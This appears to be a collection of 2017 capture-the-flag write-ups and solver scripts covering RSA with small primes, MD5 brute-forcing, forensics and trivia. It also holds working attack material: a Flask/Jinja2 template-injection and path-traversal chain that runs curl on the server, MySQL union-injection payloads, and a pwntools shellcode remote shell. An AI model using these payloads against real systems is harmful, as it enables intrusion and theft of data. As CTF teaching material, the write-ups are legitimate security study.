35 |
36 | pvt = RSA.construct((n, e, d, p, q))
37 |
38 | print(pvt.exportKey().decode())
39 | ~~~~
40 |
41 | And here it is:
42 |
43 | ~~~~
44 | -----BEGIN RSA PRIVATE KEY-----
45 | MIH5AgEAAjJSqZ4knufPPAy/ljoAlmF3K8nN9uHj+/xuRKB6Xg+JRFep+Bw64TKs
46 | VoPTWyi6XDJCQwIDAQABAjIzrQnKBvUPnpCxrK5x85DWuS8dbTtmFP+HEYHE3wja
47 | TF9QEkV6ZDCUBers1jQeQwJ5MQIaAImWgwYMdrnA3lgaaeDqnZG+0Qcb6x2SSjcC
48 | GgCZzedK7e6Hrf/daEy8R451mHC08gaS9lJVAhlmZEB1y+i/LC1L27xXycIhqKPe
49 | aoR6qVfZAhlbPhKLmhFavne/AqQbQhwaWT/rqHUL9EMtAhk5pem+TgbW3zCYF8v7
50 | j0mjJ31NC+0sLmx5
51 | -----END RSA PRIVATE KEY-----
52 | ~~~~
53 |
54 | For some weird reason (which I did not take the time to figure out), python3 was complaining about a character when decoding the flag. So instead of struggling with it forever I decided to move on and give OpenSSL a try:
55 |
56 | base64 -d flag.b64 | openssl rsautl -decrypt -inkey key.pvt | cat
57 | ALEXCTF{SMALL_PRIMES_ARE_BAD}
58 |
59 | This above simply decodes the base64 flag and uses openssl to decrypt it. And they sure do :)
60 |
--------------------------------------------------------------------------------
/2017/AlexCTF/cr4/key.pvt:
--------------------------------------------------------------------------------
1 | -----BEGIN RSA PRIVATE KEY-----
2 | MIH5AgEAAjJSqZ4knufPPAy/ljoAlmF3K8nN9uHj+/xuRKB6Xg+JRFep+Bw64TKs
3 | VoPTWyi6XDJCQwIDAQABAjIzrQnKBvUPnpCxrK5x85DWuS8dbTtmFP+HEYHE3wja
4 | TF9QEkV6ZDCUBers1jQeQwJ5MQIaAImWgwYMdrnA3lgaaeDqnZG+0Qcb6x2SSjcC
5 | GgCZzedK7e6Hrf/daEy8R451mHC08gaS9lJVAhlmZEB1y+i/LC1L27xXycIhqKPe
6 | aoR6qVfZAhlbPhKLmhFavne/AqQbQhwaWT/rqHUL9EMtAhk5pem+TgbW3zCYF8v7
7 | j0mjJ31NC+0sLmx5
8 | -----END RSA PRIVATE KEY-----
9 |
--------------------------------------------------------------------------------
/2017/AlexCTF/cr4/poor_rsa.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/AlexCTF/cr4/poor_rsa.tar.gz
--------------------------------------------------------------------------------
/2017/AlexCTF/cr4/poorrsa.py:
--------------------------------------------------------------------------------
1 | from Crypto.PublicKey import RSA
2 | import gmpy
3 | import base64
4 |
5 | # Load the challenge's public key and pull out the modulus and exponent
6 | with open('key.pub', 'r') as key:
7 |     pub = RSA.importKey(key.read())
8 |
9 | n = int(pub.n)
10 | e = int(pub.e)
11 |
12 | print(n)
13 | print(e)
14 |
15 | # Factors of n, found on factordb: both primes are far too small
16 | p = 863653476616376575308866344984576466644942572246900013156919
17 | q = 965445304326998194798282228842484732438457170595999523426901
18 | assert p * q == n
19 |
20 | # Private exponent d = e^-1 mod (p-1)(q-1)
21 | # We could also use the same algorithm we did with cr3
22 | d = int(gmpy.invert(e, (p - 1) * (q - 1)))
23 | print(d)
24 |
25 | # Rebuild the private key and print it in PEM form (this is key.pvt)
26 | pvt = RSA.construct((n, e, d, p, q))
27 | print(pvt.exportKey().decode())
28 |
29 | # The base64 flag decodes straight to the raw ciphertext bytes (not hex)
30 | flag = b"Ni45iH4UnXSttNuf0Oy80+G5J7tm8sBJuDNN7qfTIdEKJow4siF2cpSbP/qIWDjSi+w="
31 | c = int.from_bytes(base64.b64decode(flag), 'big')
32 |
33 | # Textbook RSA decryption, then strip the PKCS#1 v1.5 padding: 00 02 <pad> 00 <msg>
34 | m = pow(c, d, n)
35 | pt = m.to_bytes((n.bit_length() + 7) // 8, 'big')
36 | print(pt.split(b'\x00', 2)[-1])
37 |
--------------------------------------------------------------------------------
/2017/AlexCTF/fore1/README.MD:
--------------------------------------------------------------------------------
1 | # Fore1: Hit the core
2 |
3 | ## Description
4 |
5 | No description!
6 |
7 | ## Solution
8 |
9 | A simple strings command in the binary showed us an interesting string:
10 |
11 | ```
12 | cvqAeqacLtqazEigwiXobxrCrtuiTzahfFreqc{bnjrKwgk83kgd43j85ePgb_e_rwqr7fvbmHjklo3tews_hmkogooyf0vbnk0ii87Drfgh_n kiwutfb0ghk9ro987k5tfb_hjiouo087ptfcv}
13 | ```
14 |
15 | Our teammates cyborg, mvalle and nano found the string ALEXCTF inside the scrambled text:
16 |
17 |
18 | cvqAeqacLtqazEigwiXobxrCrtuiTzahfFreqc{bnjrKwgk83kgd43j85ePgb_e_rwqr7fvbmHjklo3tews_hmkogooyf0vbnk0ii87Drfgh_n kiwutfb0ghk9ro987k5tfb_hjiouo087ptfcv}
19 |
20 | After a few minutes, cyborg got the rest of the string:
21 |
22 | cvqAeqacLtqazEigwiXobxrCrtuiTzahfFreqc{bnjrKwgk83kgd43j85ePgb_e_rwqr7fvbmHjklo3tews_hmkogooyf0vbnk0ii87Drfgh_n kiwutfb0ghk9ro987k5tfb_hjiouo087ptfcv}
23 |
24 | Flag: ALEXCTF{K33P_7H3_g00D_w0rk_up}
--------------------------------------------------------------------------------
/2017/AlexCTF/fore1/fore1.core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/AlexCTF/fore1/fore1.core
--------------------------------------------------------------------------------
/2017/AlexCTF/re4/README.md:
--------------------------------------------------------------------------------
1 | We received a .pyc file. After decompiling it we got:
2 |
3 | ~~~~
4 | # uncompyle6 version 2.9.9
5 | # Python bytecode 2.7 (62211)
6 | # Decompiled from: Python 2.7.12+ (default, Aug 4 2016, 20:04:34)
7 | # [GCC 6.1.1 20160724]
8 | # Embedded file name: unvm_me.py
9 | # Compiled at: 2016-12-20 19:44:01
10 | import md5
11 | md5s = [174282896860968005525213562254350376167L, 137092044126081477479435678296496849608L, 126300127609096051658061491018211963916L, 314989972419727999226545215739316729360L, 256525866025901597224592941642385934114L, 115141138810151571209618282728408211053L, 8705973470942652577929336993839061582L, 256697681645515528548061291580728800189L, 39818552652170274340851144295913091599L, 65313561977812018046200997898904313350L, 230909080238053318105407334248228870753L, 196125799557195268866757688147870815374L, 74874145132345503095307276614727915885L]
12 | print 'Can you turn me back to python ? ...'
13 | flag = raw_input('well as you wish.. what is the flag: ')
14 | if len(flag) > 69:
15 |     print 'nice try'
16 |     exit()
17 | if len(flag) % 5 != 0:
18 |     print 'nice try'
19 |     exit()
20 | for i in range(0, len(flag), 5):
21 |     s = flag[i:i + 5]
22 |     if int('0x' + md5.new(s).hexdigest(), 16) != md5s[i / 5]:
23 |         print 'nice try'
24 |         exit()
25 |
26 | print 'Congratz now you have the flag'
27 | # okay decompiling unvm_me.pyc
28 | ~~~~
29 |
30 | The algorithm is pretty simple. It takes the given flag and divides it into chunks of 5 characters each. Then it takes the md5 hash of each chunk, converts it from hex to an integer and compares it with the corresponding entry in the md5s list. Each chunk is checked independently of the others, which is what makes brute-forcing feasible.
31 |
32 | We could have brute-forced everything, but we found the hashes at hashkiller.co.uk. Well, almost all of them: the seventh chunk was not cracked.
33 |
34 | ~~~~
35 | 831daa3c843ba8b087c895f0ed305ce7 MD5 : ALEXC
36 | 6722f7a07246c6af20662b855846c2c8 MD5 : TF{dv
37 | 5f04850fec81a27ab5fc98befa4eb40c MD5 : 5d4s2
38 | ecf8dcac7503e63a6a3667c5fb94f610 MD5 : vj8nk
39 | c0fd15ae2c3931bc1e140523ae934722 MD5 : 43s8d
40 | 569f606fd6da5d612f10cfb95c0bde6d MD5 : 8l6m1
41 |
42 | c11e2cd82d1f9fbd7e4d6ee9581ff3bd MD5 : ds9v4
43 | 1df4c637d625313720f45706a48ff20f MD5 : 1n52n
44 | 3122ef3a001aaecdb8dd9d843c029e06 MD5 : v37j4
45 | adb778a0f729293e7e0b19b96a4c5a61 MD5 : 81h3d
46 | 938c747c6a051b3e163eb802a325148e MD5 : 28n4b
47 | 38543c5e820dd9403b57beff6020596d MD5 : 6v3k}
48 | ~~~~
49 |
50 | So we crafted this silly script to brute-force the missing part:
51 |
52 | ~~~~
53 | import itertools
54 | import string
55 | import hashlib
56 |
57 | # Candidate characters: digits and lowercase letters, like the cracked chunks
58 | alphabets = '0' + string.ascii_lowercase + '123456789'
59 |
60 | # md5s[6] from the decompiled script: the only chunk hashkiller did not know
61 | target = 8705973470942652577929336993839061582
62 |
63 | for s in itertools.product(alphabets, repeat=5):
64 |     s = ''.join(s)
65 |     # Same check the challenge performs: md5 of the chunk, read as an integer
66 |     if int(hashlib.md5(s.encode()).hexdigest(), 16) == target:
67 |         print(s)
68 |         print('OK')
69 |         break
69 | ~~~~
70 |
71 | And there it was. *n5l67* was all we needed.
72 |
73 | ALEXCTF{dv5d4s2vj8nk43s8d8l6m1n5l67ds9v41n52nv37j481h3d28n4b6v3k} o/
74 |
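The chunk-by-chunk check is what makes this flag crackable, so here is an added example (not from the write-up or the challenge) that generalizes the solver above: it rebuilds the checker's md5 list for any flag and recovers a flag from such a list chunk by chunk, reusing chunks already known from elsewhere. Alphabet and chunk size match the script above; the short test flag is constructed.

```python
import hashlib
import itertools
import string

CHUNK = 5
# Same 36-symbol set the solver above used: digits plus lowercase letters
ALPHABET = string.digits + string.ascii_lowercase
# md5s[6] from unvm_me.py: the chunk hashkiller did not know (the write-up got n5l67)
ALEXCTF_MISSING = 8705973470942652577929336993839061582


def chunk_digests(flag, size=CHUNK):
    """The checker's view of a flag: md5 of every `size`-char slice, as an int.
    This is exactly what the md5s list in unvm_me.py stores."""
    if len(flag) % size != 0:
        raise ValueError("flag length must be a multiple of %d" % size)
    return [int(hashlib.md5(flag[i:i + size].encode()).hexdigest(), 16)
            for i in range(0, len(flag), size)]


def crack_chunk(target, alphabet=ALPHABET, size=CHUNK):
    """Brute-force a single chunk: at most len(alphabet) ** size md5 calls."""
    for cand in itertools.product(alphabet, repeat=size):
        s = ''.join(cand)
        if int(hashlib.md5(s.encode()).hexdigest(), 16) == target:
            return s
    return None


def crack_flag(digests, alphabet=ALPHABET, size=CHUNK, known=None):
    """Recover a whole flag chunk by chunk. `known` maps chunk index -> text for
    chunks already recovered elsewhere (hashkiller supplied 12 of 13 here), so
    only the remaining ones are brute-forced. Returns None if any chunk fails."""
    known = known or {}
    parts = []
    for idx, target in enumerate(digests):
        s = known.get(idx) or crack_chunk(target, alphabet, size)
        if s is None:
            return None
        parts.append(s)
    return ''.join(parts)


def search_space(alphabet=ALPHABET, size=CHUNK, chunks=13):
    """Why hashing independent chunks is fatal: (work to crack every chunk
    separately, work to brute-force the whole flag at once)."""
    return len(alphabet) ** size * chunks, len(alphabet) ** (size * chunks)
```

`crack_chunk(ALEXCTF_MISSING)` runs the full 36**5 search the write-up's script did; the test below uses a smaller constructed alphabet so it finishes instantly.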
--------------------------------------------------------------------------------
/2017/AlexCTF/re4/re4.py:
--------------------------------------------------------------------------------
1 | import itertools
2 | import string
3 | import hashlib
4 |
5 | # Candidate characters: digits and lowercase letters, like the cracked chunks
6 | alphabets = '0' + string.ascii_lowercase + '123456789'
7 |
8 | # md5s[6] from the decompiled script: the only chunk hashkiller did not know
9 | target = 8705973470942652577929336993839061582
10 |
11 | for s in itertools.product(alphabets, repeat=5):
12 |     s = ''.join(s)
13 |     # Same check the challenge performs: md5 of the chunk, read as an integer
14 |     if int(hashlib.md5(s.encode()).hexdigest(), 16) == target:
15 |         print(s)
16 |         print('OK')
17 |         break
17 |
18 |
--------------------------------------------------------------------------------
/2017/BSides/Ancient Hop Grain Juice/README.MD:
--------------------------------------------------------------------------------
1 | # MISC - Ancient Hop Grain Juice
2 |
3 | ## Description
4 |
5 | This beverage, brewed since ancient times, is made from hops and grains?
6 |
7 | ## Solution
8 |
9 | beer
10 |
--------------------------------------------------------------------------------
/2017/BSides/Forensics-easycap/README.MD:
--------------------------------------------------------------------------------
1 | # Forensics - Easycap
2 |
3 | ## Description
4 |
5 | Can you get the flag from the packet capture?
6 |
7 | ## Solution
8 |
9 | The challenge provides a PCAP file. I just opened it in Wireshark, right-clicked a packet and chose Follow TCP Stream. The flag was there.
10 | # FLAG:385b87afc8671dee07550290d16a8071
11 |
--------------------------------------------------------------------------------
/2017/BSides/Forensics-easycap/easycap.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BSides/Forensics-easycap/easycap.pcap
--------------------------------------------------------------------------------
/2017/BSides/MISC-Let-s play a game/README.MD:
--------------------------------------------------------------------------------
1 | # MISC - Let's play a game
2 |
3 | ## Description
4 |
5 | This is the name of the game that a young hacker thinks he's playing with the WOPR Supercomputer. [Spaces expected]
6 |
7 | ## Solution
8 |
9 | According to Wikipedia (https://en.wikipedia.org/wiki/WarGames), the answer is
10 | # Global Thermonuclear War
11 |
--------------------------------------------------------------------------------
/2017/BSides/MISC-Quote/README.MD:
--------------------------------------------------------------------------------
1 | # MISC - Quote
2 |
3 | ## Description
4 |
5 | This movie featured the memorable phrase "My voice is my passport".
6 |
7 | ## Solution
8 |
9 | Google: "My voice is my passport"
10 | # Sneakers
11 |
--------------------------------------------------------------------------------
/2017/BSides/MISC-The Right Cipher/README.MD:
--------------------------------------------------------------------------------
1 | # MISC - The Right Cipher
2 |
3 | ## Description
4 |
5 | This cipher was correctly used in TKIP
6 |
7 | ## Solution
8 |
9 | According to Wikipedia (https://pt.wikipedia.org/wiki/TKIP), the answer is
10 | # RC4
11 |
--------------------------------------------------------------------------------
/2017/BSides/NOP/README.MD:
--------------------------------------------------------------------------------
1 | # NOP
2 |
3 | ## Description
4 |
5 | x86's NOP is actually another instruction. What is the Intel syntax representation of the assembly of the other Instruction?
6 | Include a space between operands, if applicable.
7 |
8 | ## Solution
9 |
10 | According to Wikipedia (https://en.wikipedia.org/wiki/NOP), the answer is:
11 |
12 | # xchg eax, eax
13 |
--------------------------------------------------------------------------------
/2017/BSides/Zumbo/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BSides/Zumbo/1.png
--------------------------------------------------------------------------------
/2017/BSides/Zumbo/README.MD:
--------------------------------------------------------------------------------
1 | # Zumbo 1/2/3
2 |
3 | ## Description
4 |
5 | Welcome to ZUMBOCOM....you can do anything at ZUMBOCOM.
6 |
7 | Three flags await. Can you find them?
8 |
9 | http://zumbo-8ac445b1.ctf.bsidessf.net
10 |
11 |
12 | ## Solution
13 |
14 | First of all: I spent about 2 hours getting all three flags. The third one was nice because I had never exploited something like that; I really liked this challenge!
15 | Well, let's write it up!
16 |
17 |
18 | ### Zumbo1
19 |
20 | The first part of the challenge was easy, at the bottom of the source code there was this:
21 |
22 | ```html
23 |
24 | ```
25 |
26 | My first thought was that this could be a Flask exploitation, and luckily I was right! I had already read a nice article about Flask vulnerabilities [here](https://nvisium.com/blog/2015/12/07/injecting-flask/), but had never needed to use it.
27 |
28 | Confirming the vulnerability:
29 |
30 | ```
31 | http://zumbo-8ac445b1.ctf.bsidessf.net/{{ 333+333 }}
32 | ```
33 | This returns 666, which means the server evaluated our template expression (server-side template injection), and now we can get more information, for example the application's source code.
34 |
35 | In this case, we had to encode the '/': http://zumbo-8ac445b1.ctf.bsidessf.net//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fcode/server.py
36 |
37 | ```python
38 | import flask, sys, os
39 | import requests
40 |
41 | app = flask.Flask(__name__)
42 | counter = 12345672
43 |
44 | # Any path segment is used as a template file name (the angle brackets of the
45 | # <page> placeholder were lost when this write-up was extracted)
46 | @app.route('/<page>')
47 | def custom_page(page):
48 |     if page == 'favicon.ico':
49 |         return ''
50 |
51 |     global counter
52 |     counter += 1
53 |
54 |     try:
55 |         template = open(page).read()
56 |     except Exception as e:
57 |         # On failure the exception text plus the requested name end up in the
58 |         # template source and are rendered by Jinja2: this is the SSTI. The two
59 |         # %s are implied by the format arguments; the HTML comment around them
60 |         # is reconstructed, the original markup was lost in extraction.
61 |         template = str(e)
62 |         template += "\n\n<!-- %s %s -->" % (page, __file__)
63 |     return flask.render_template_string(template, name='test', counter=counter)
64 |
65 |
66 | @app.route('/')
67 | def home():
68 |     return flask.redirect('/index.template')
69 |
70 | if __name__ == '__main__':
71 |     flag1 = 'FLAG: FIRST_FLAG_WASNT_HARD'
72 |
73 |     with open('/flag') as f:
74 |         flag2 = f.read()
75 |
76 |     flag3 = requests.get('http://vault:8080/flag').text
77 |     print "Ready set go!"
78 |     sys.stdout.flush()
79 |
80 |     app.run(host="0.0.0.0")
81 | ```
72 |
73 | Zumbo1 flag: FIRST_FLAG_WASNT_HARD
74 |
75 |
76 | ### Zumbo2
77 |
78 | The second part of the challenge was easy too. We just had to read the file called flag:
79 |
80 | ```
81 | http://zumbo-8ac445b1.ctf.bsidessf.net//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fflag
82 | ```
83 |
84 | Zumbo2 flag: RUNNER_ON_SECOND_BASE
85 |
86 |
87 | ### Zumbo3
88 |
89 | Now the cool part \o
90 |
91 | As you can see above, there is a local variable called flag3. I spent a long time trying to read this value: I was able to read the global counter, but not this one.
92 |
93 | So I started thinking about making the request myself and fetching the value, instead of reading flag3. *(If someone knows how to do that, please tell me).*
94 |
95 | On the same blog there is another article where the author goes deeper into Flask vulnerabilities: https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/
96 |
97 | Following those steps, I was able to execute commands on the server, but how could I get the flag? At the time I was receiving Internal Server Error from time to time, so I decided to loop the request until it succeeded, using curl on the server side to fetch the flag:
98 |
99 | ```python
100 | import requests
101 |
102 | while True:
103 |     r = requests.get("http://zumbo-8ac445b1.ctf.bsidessf.net/{{ config['RUNCMD']('/usr/bin/curl http://vault:8080/flag',shell=True)%20%7D%7D")
104 |     if r.status_code == 200:
105 |         print(r.text)
106 |         exit()
107 | ```
108 |
109 | 
110 |
111 | Zumbo3 flag: BRICK_HOUSE_BEATS_THE_WOLF
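All three flags come from the same two defects in server.py above: the page name is used as a file path (hence `..%2f` reaching /flag and /code/server.py) and it is concatenated into the template source (hence `{{ 333+333 }}` evaluating). The following is an added example, not code from the challenge or the write-up, of how a defender closes both; `TEMPLATE_DIR` is a constructed path.

```python
import os
import re
from urllib.parse import unquote

# Constructed template directory for the demo (hypothetical; the challenge opened
# files relative to its working directory, which is how /flag became readable)
TEMPLATE_DIR = "/srv/zumbo/templates"

# A page name is a plain file name: no slashes, no spaces, no Jinja2 delimiters
PAGE_NAME_RE = re.compile(r"[A-Za-z0-9_.-]+")


def safe_template_path(base_dir, requested):
    """Absolute path of the requested template under base_dir, or None.

    Decodes percent-encoding first (so ..%2f..%2f is seen as ../../), applies
    the allow-list, then verifies the resolved path is still inside base_dir.
    realpath also follows symlinks, so a link inside base_dir that points
    outside it is rejected as well.
    """
    name = unquote(requested)
    if not PAGE_NAME_RE.fullmatch(name) or name in (".", ".."):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def missing_page_template(page):
    """Fix for the SSTI: keep the template source constant and hand the
    user-controlled page name over in the context, where Jinja2 treats it as
    data and prints "{{ 333+333 }}" literally. Returns (template_source,
    context) ready for flask.render_template_string(source, **context)."""
    template = "Page not found\n\n<!-- {{ page }} -->"
    return template, {"page": page}
```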
--------------------------------------------------------------------------------
/2017/BSides/easyshell/README.md:
--------------------------------------------------------------------------------
1 | As the name of the chall says, we need a shell. And it should be easy to get.
2 |
3 | Instead of trying to figure out exactly what the C code implements, we chose to craft a simple shellcode for getting the shell.
4 |
5 | Pwntools is a wonderful tool for PWN, as expected. It can solve multiple kinds of CTF problems, including shellcode generation.
6 |
7 | ~~~~
8 | from pwn import *
9 | context(arch = 'i386', os = 'linux')
10 |
11 | r = remote('easyshell-f7113918.ctf.bsidessf.net', 5252)
12 | r.send(asm(shellcraft.sh()))
13 | r.interactive()
14 | ~~~~
15 |
16 | After getting the shell, just read the flag:
17 |
18 | ~~~~
19 | $ python easyshell.py
20 | [+] Opening connection to easyshell-f7113918.ctf.bsidessf.net on port 5252: Done
21 | [*] Switching to interactive mode
22 | Send me stuff!!
23 | $ cat /home/ctf/flag.txt
24 | FLAG:c832b461f8772b49f45e6c3906645adb
25 | ~~~~
26 |
27 |
--------------------------------------------------------------------------------
/2017/BitsCTF/Batman vs Joker/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BitsCTF/Batman vs Joker/1.png
--------------------------------------------------------------------------------
/2017/BitsCTF/Batman vs Joker/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BitsCTF/Batman vs Joker/2.png
--------------------------------------------------------------------------------
/2017/BitsCTF/Batman vs Joker/README.MD:
--------------------------------------------------------------------------------
1 | # Batman vs Joker
2 |
3 | ## Description
4 |
5 | Joker has left a message for you. Your job is to get to the message asap.
6 |
7 | joking.bitsctf.bits-quark.org
8 |
9 | ## Solution
10 |
11 | First of all, in this challenge I used two useful Firefox add-ons: Firebug and Hackbar :) (I really like these add-ons).
12 |
13 | I started analysing the challenge by guessing the required ID at the index page, and obviously the value 1 was found.
14 |
15 | 
16 |
17 | With Firebug I was able to get the full request and its parameters. Given the context, I had an idea that the challenge was related to SQL injection, so I confirmed the vulnerability by forcing an error in the page with an incorrect parameter value. The result:
18 |
19 | ```
20 | You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' Limit 1' at line 1
21 | ```
22 |
23 | The next step is to get more information about the challenge database. The payload that worked had this structure: *1' injection #*.
24 |
25 | An important thing about SQL injection is to always try to find out the database version. In this case I was able to use [information_schema](https://dev.mysql.com/doc/refman/5.7/en/information-schema.html) because we were exploiting a MySQL 5 or newer environment (information_schema exists since MySQL 5.0).
26 |
27 | 
28 |
29 | In the following commands I used information_schema to list the tables of the current database and their columns, and then dump the data.
30 |
31 | Tables:
32 | ```php
33 | id=1' union select 1,table_name from information_schema.tables where table_schema=database() #&submit1=submit
34 |
35 | First name:1
36 | Surname: CIA_Official_Records
37 |
38 | First name:1
39 | Surname: Joker
40 |
41 | ```
42 |
43 | Columns:
44 | ```php
45 | id=1' union select 1,column_name from information_schema.columns where table_name='Joker' #&submit1=submit
46 |
47 | First name:1
48 | Surname: Flag
49 |
50 | First name:1
51 | Surname: HaHaHa
52 | ```
53 |
54 | Dumping the data:
55 | ```php
56 | id=1' union select 1,concat_ws(':',Flag,HaHaHa) from Joker #&submit1=submit
57 |
58 | First name:1
59 | Surname: BITSCTF{wh4t_d03snt_k1ll_y0u_s1mply_m4k3s_y0u_str4ng3r!}:Enjoying the game Batman!!!
60 | ```
61 |
62 | Flag: BITSCTF{wh4t_d03snt_k1ll_y0u_s1mply_m4k3s_y0u_str4ng3r!}
--------------------------------------------------------------------------------
/2017/BitsCTF/BotBot/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BitsCTF/BotBot/1.png
--------------------------------------------------------------------------------
/2017/BitsCTF/BotBot/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BitsCTF/BotBot/2.png
--------------------------------------------------------------------------------
/2017/BitsCTF/BotBot/README.MD:
--------------------------------------------------------------------------------
1 | # BotBot
2 |
3 | ## Description
4 |
5 | Should not ask for the description of a 5 marker.
6 | botbot.bitsctf.bits-quark.org
7 |
8 | ## Solution
9 |
10 | Accessing the given website, there wasn't anything interesting in the source code besides a note about SEO (Search Engine Optimization).
11 | SEO is a set of techniques for improving how your website shows up in search results.
12 |
13 | 
14 |
15 | One of these techniques is the robots.txt configuration. So, following this path, we found something:
16 |
17 | 
18 |
19 | In this directory, we got the flag: BITCTF{take_a_look_at_googles_robots_txt}
--------------------------------------------------------------------------------
/2017/BitsCTF/Labour/README.MD:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BitsCTF/Labour/README.MD
--------------------------------------------------------------------------------
/2017/BitsCTF/README.MD:
--------------------------------------------------------------------------------
1 | BitsCTF writeups
2 |
--------------------------------------------------------------------------------
/2017/BitsCTF/Sherlock/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BitsCTF/Sherlock/1.png
--------------------------------------------------------------------------------
/2017/BitsCTF/Sherlock/README.MD:
--------------------------------------------------------------------------------
1 | # Sherlock
2 |
3 | ## Description
4 |
5 | Sherlock has a mystery in front of him. Help him to find the flag.
6 |
7 | ## Solution
8 |
9 | The given file is a plain text file, without any special information. It's just a text from the adventures of the great Sherlock Holmes.
10 | We found something interesting while we were working on this challenge: there were some capital letters in odd places.
11 | Our teammate @cyborg found this and we started to work on it.
12 |
13 | 
14 |
15 | These groups of capital letters are clearly the words 'ZERO' and 'ONE'.
16 | From this approach, we assumed we had to convert this binary information to something readable.
17 |
18 | With a simple python script, we got the flag:
19 |
20 | ```python
21 | import re
22 |
23 | # Collect the out-of-place capital letters in order; they spell ZERO and ONE
24 | word = open('final.txt').read()
25 | bits = ''.join(re.findall('[A-Z]', word)).replace('ZERO', '0').replace('ONE', '1')
26 | # Read the bit string as a big-endian number and turn it back into bytes
27 | n = int(bits, 2)
28 | print(n.to_bytes((len(bits) + 7) // 8, 'big').decode())
27 | ```
28 |
29 | Which gave us the flag: BITSCTF{h1d3_1n_pl41n_5173}
--------------------------------------------------------------------------------
/2017/BitsCTF/Sherlock/solve.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | # Collect the out-of-place capital letters in order; they spell ZERO and ONE
4 | word = open('final.txt').read()
5 | bits = ''.join(re.findall('[A-Z]', word)).replace('ZERO', '0').replace('ONE', '1')
6 | # Read the bit string as a big-endian number and turn it back into bytes
7 | n = int(bits, 2)
8 | print(n.to_bytes((len(bits) + 7) // 8, 'big').decode())
--------------------------------------------------------------------------------
/2017/BreakIn/A present for her Birthday!/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BreakIn/A present for her Birthday!/1.png
--------------------------------------------------------------------------------
/2017/BreakIn/A present for her Birthday!/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BreakIn/A present for her Birthday!/2.png
--------------------------------------------------------------------------------
/2017/BreakIn/A present for her Birthday!/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BreakIn/A present for her Birthday!/3.png
--------------------------------------------------------------------------------
/2017/BreakIn/A present for her Birthday!/README.MD:
--------------------------------------------------------------------------------
1 | # A present for her Birthday!
2 |
3 | ## Description
4 |
5 | Yesterday was Animesh's best friend's (at least he thinks so) birthday. Animesh had bought a nice present for her, but she didn't even invite Animesh :-( . He came to know that only the people who have the secret key for the birthday party can get the invitation the party. Unfortunately Animesh does not have that key, but he know that the key can be found [here](https://felicity.iiit.ac.in/contest/extra/birthday). Can you help Animesh find the key so that he can attend her birthday party and give her the sweetest present he bought for her.
6 |
7 | ## Solution
8 |
9 | The link redirects us to a simple website with no links, inputs or anything else. There was just a message:
10 |
11 | 
12 |
13 | With no information in the source code, I started looking at the cookies, where I found something interesting:
14 |
15 | 
16 |
17 | The cookie birthday_invite has the value *68934a3e9455fa72420237eb05902327* which is the md5 hash for "false".
18 |
19 | Following a simple logic, I changed its value to *b326b5062b2f0e69046810717534cb09*, which is the md5 hash of "true", and here's the result:
20 |
21 | 
22 |
23 | Flag: the_flag_is_6bdfde3455a864cde19362cc01da125f
--------------------------------------------------------------------------------
/2017/BreakIn/A weird C program/README.md:
--------------------------------------------------------------------------------
1 | We were given a C (C++ in fact) code and that was all. Of course, my first idea was to start reading that cryptic code, deciphering its loops and so on.
2 |
3 | Sometime during the contest the admin posted this hint:
4 |
5 | HINT: It's much more than just a C program
6 |
7 | So, could it be something other than a C program? Let's see. The first thing that caught my C-eyes was that indentation... it sends shivers down the spine. Now wait a minute! Look at the whitespace. It reminds me of that esolang, *Whitespace*!
8 |
9 | And that was it indeed. The code was in the whitespaces, not the proper characters themselves. Using this interpreter http://ws2js.luilak.net/interpreter.html we got the flag.
10 |
11 | the_flag_is_WpUAItsadmhak
12 |
--------------------------------------------------------------------------------
/2017/BreakIn/A weird C program/program.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | /*int main( int argc, char **argv )
6 | {*/
7 | #define EEr_Rs 0x4b
8 | #include
9 | #include
10 | #include
11 | #define LINE_new '\n'
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 |
19 | int main(){ int run;
20 | run>>=5;run=0;
21 | run&=01; int FELICITY[10000];
22 | run>>=5;
23 | using namespace std;
24 |
25 |
26 |
27 | char *res[6] = {"Nothing_" ,
28 |
29 | " and _no _one _is _perfect. ",
30 |
31 | "It_ just _takes_ a_good _eye_",
32 |
33 | "to_find_" ,
34 |
35 | "those_ hidden_" ,
36 |
37 | "imperfections. :)" };
38 |
